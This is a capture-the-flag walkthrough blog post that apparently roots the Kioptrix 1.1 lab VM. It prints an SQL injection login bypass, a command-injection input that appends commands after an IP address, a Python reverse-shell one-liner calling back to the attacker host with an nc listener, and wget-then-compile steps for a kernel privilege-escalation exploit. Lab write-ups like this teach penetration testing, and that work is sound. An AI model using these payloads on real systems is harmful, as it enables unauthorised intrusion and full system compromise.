Kioptrix 1.1 is a beginners level CTF challenge. It is the second part part of Kioptrix series. It can be downloaded from vulnhub. The objective of this challenge is to get root access on the machine via any possible mean. There may be more ways then one to successfully complete the challenges.

Note: In order to keep all my CTF’s blog crisp and concise, I only mentioned the steps which led to positive results. There were lot of trial and error and hours or in some case even days of failed attempts before reaching to the correct solution. So I strongly recommend to try the challenges on your own before moving on to see the solutions. Checking the walkthrough should be the last resort.

My lab setup consists of Kali linux (will be referred as attacker) running in VMWare Player and the network adapter is set to NAT. Network settings of downloaded VM (will be referred as victim) is changed (if not already) to NAT to bring it to the same network where my attacking machine is present. I approach every challenge with the typical penetration testing methodology of Reconnaissance, Exploitation and Post Exploitation.

Reconnaissance

After booting up the VM, the first task is to find the IP address of it. My Kali box and Kioptrix machine is on the same network (as the network setting is NAT). I start with checking my IP address using ifconfig. IP address of my Kali machine is 192.168.57.137. Now knowing the network address, I scanned the whole network for the live hosts using netdiscover

netdiscover -r 192.168.57.0/24 1 netdiscover - r 192.168.57.0 / 24

The IP address of Kiotprix machine is 192.168.57.138

Now it is the time for port scanning. I used nmap to perform SYN scan (-sS) of all 65535 ports (-p-), detect the version (-A) of the running services. The result is displayed in verbose mode (-v).

nmap -sS -p- -v -A 192.168.57.138 1 nmap - sS - p - - v - A 192.168.57.138

Scan result was a bit exhaustive, so I am only showing the interesting part. The box is running web server with port 80 listening for incoming connections.

Exploitation

On navigating to the url http://192.168.57.138 we see a login form. Lets try for SQL Injection. I provided the input Administrator’ or 1=1# .

We were able to bypass the login page !!!

The page expects an IP address as the input. When providing Kali machine’s IP, a page pingit.php opens and displays the output of ‘ping‘ command. By observing the output it is most likely that the web application is vulnerable to arbitrary code execution. To verify this, lets append a linux command separated by ; along with the IP address. I used ‘ls‘ to list all the directories present in the current folder. And it worked !!!



We have found arbitrary code execution vulnerability. Our next goal is to get the reverse shell.

Enumerate more

Lets check the source code of the pingit.php script. I provided the following input to index.php page

192.168.57.138; cat pingit.php 1 192.168.57.138 ; cat pingit .php

We can see “shell_exec” is used to execute command via shell. The function’s manual page tells

This function can return NULL both when an error occurs or the program produces no output. It is not possible to detect execution failures using this function. exec() should be used when access to the program exit code is required.

Since shell_exec does not display any error messages, we will be redirecting standard error (file descriptor 2) to standard output (file descriptor 1) for every command we execute via index.php page. This will help us in debugging and identifying the reason(s) if any of our command fails to execute.

I prefer using python reverse shell script from pentestmonkey

Check if python is installed on the victim

192.168.57.138; locate python 2>&1 1 192.168.57.138 ; locate python 2 > & 1

Check for the installed python version

192.168.57.137| python -V 2>&1 1 192.168.57.137 | python - V 2 > & 1

The installed python version was found to be Python 2.3.4

Since the python script from pentestmonkey is for Python version 2.7, it will not work here because ‘subprocess‘ method is not supported in Python 2.3.4

I modified the reverse shell script for current version of Python

python -c 'import socket,shlex,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.57.137",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);os.system("/bin/sh"); 1 python - c ' import socket , shlex , os ; s = socket .socket ( socket .AF_INET , socket .SOCK_STREAM ) ; s .connect ( ( "192.168.57.137" , 1234 ) ) ; os .dup2 ( s .fileno ( ) , 0 ) ; os .dup2 ( s .fileno ( ) , 1 ) ; os .dup2 ( s .fileno ( ) , 2 ) ; os .system ( "/bin/sh" ) ;

Before executing the script, open the listener on Kali to receive the shell back

nc -nlvp 1234 1 nc - nlvp 1234

Now provide the following input to get the reverse shell

192.168.57.137| python -c 'import socket,shlex,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.57.137",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);os.system("/bin/sh");' 2>&1 1 192.168.57.137 | python - c 'import socket,shlex,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.57.137",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);os.system("/bin/sh");' 2 > & 1







Post Exploitation

Lets do some information gathering on the victim.

whoami id uname -a 1 2 3 whoami id uname - a

The shell which we got is for ‘apache‘ user which is having limited privileges. Our objective is to escalate privilege and become ‘root‘.

There is an kernel exploit available on exploit-db for Linux Kernel 2.6.9 which will elevate the privilege to root. Download the exploit to the ‘tmp’ directory on the victim.

wget -O /tmp/mod.c https://www.exploit-db.com/exploits/9542/ 1 wget - O / tmp / mod .c https : / / www .exploit - db .com / exploits / 9542 /

Compile the exploit and run it

gcc -o /tmp/9542 /tmp/9542.c /tmp/9542 1 2 gcc - o / tmp / 9542 / tmp / 9542.c / tmp / 9542

Bang !!!! Now we have root access on the victim 😀



I hope this write-up was helpful. Share this if you found it useful. If you have any questions please leave you comments. Subscribe to the mailing list to get updates for my future CTF write-ups and blogs.

Happy Learning 🙂